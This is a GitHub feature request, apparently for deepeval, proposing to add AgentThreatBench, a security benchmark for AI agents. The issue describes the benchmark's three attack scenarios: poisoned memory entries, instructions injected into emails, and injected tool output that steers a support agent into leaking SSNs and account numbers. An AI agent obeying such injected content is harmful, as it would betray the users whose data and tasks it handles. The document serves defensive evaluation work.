Feature request: Add AgentThreatBench (OWASP Agentic Top 10) as a built-in security benchmark

## Summary

[AgentThreatBench](https://ukgovernmentbeis.github.io/inspect_evals/evals/safeguards/agent_threat_bench/) is the first benchmark suite that operationalizes the **OWASP Top 10 for Agentic Applications (2026)** into executable evaluation tasks. It was merged into [UKGovernmentBEIS/inspect_evals](https://github.com/UKGovernmentBEIS/inspect_evals/pull/1037), the official evaluation suite maintained by the UK AI Safety Institute.

## What it benchmarks

Three tasks targeting distinct agentic attack surfaces:

- **Memory Poison (ASI06)** — Tests whether agents correctly answer questions from a memory store that contains adversarial entries (direct injection, context poisoning, gradual poisoning, authority impersonation, delimiter escape, role hijack)
- **Autonomy Hijack (ASI01)** — Tests whether agents performing email triage resist indirect instruction injection embedded in email content returned by tools
- **Data Exfiltration (ASI01)** — Tests whether a customer-support agent can be redirected via indirect injection in `lookup_customer` output into leaking SSNs/account numbers via `send_message`

## Scoring approach

Uses a **dual-metric** approach: **utility** (task completion) + **security** (attack resistance) scored independently. This maps well to deepeval's metric architecture.

## Proposal

Add AgentThreatBench as a built-in security benchmark in deepeval, similar to how deepeval already supports custom red-team metrics. The dataset is open-source.

**Benchmark docs:** https://ukgovernmentbeis.github.io/inspect_evals/evals/safeguards/agent_threat_bench/
**Source:** https://github.com/UKGovernmentBEIS/inspect_evals/tree/main/src/inspect_evals/agent_threat_bench
**OWASP reference:** https://genai.owasp.org/resource/owasp-top-10-for-agentic-applications-for-2026/


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Feature request: Add AgentThreatBench (OWASP Agentic Top 10) as a built-in security benchmark #2681

Summary

What it benchmarks

Scoring approach

Proposal

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Feature request: Add AgentThreatBench (OWASP Agentic Top 10) as a built-in security benchmark #2681

Description

Summary

What it benchmarks

Scoring approach

Proposal

Metadata

Metadata

Assignees

Labels

Type

Fields

Projects

Milestone

Relationships

Development

Issue actions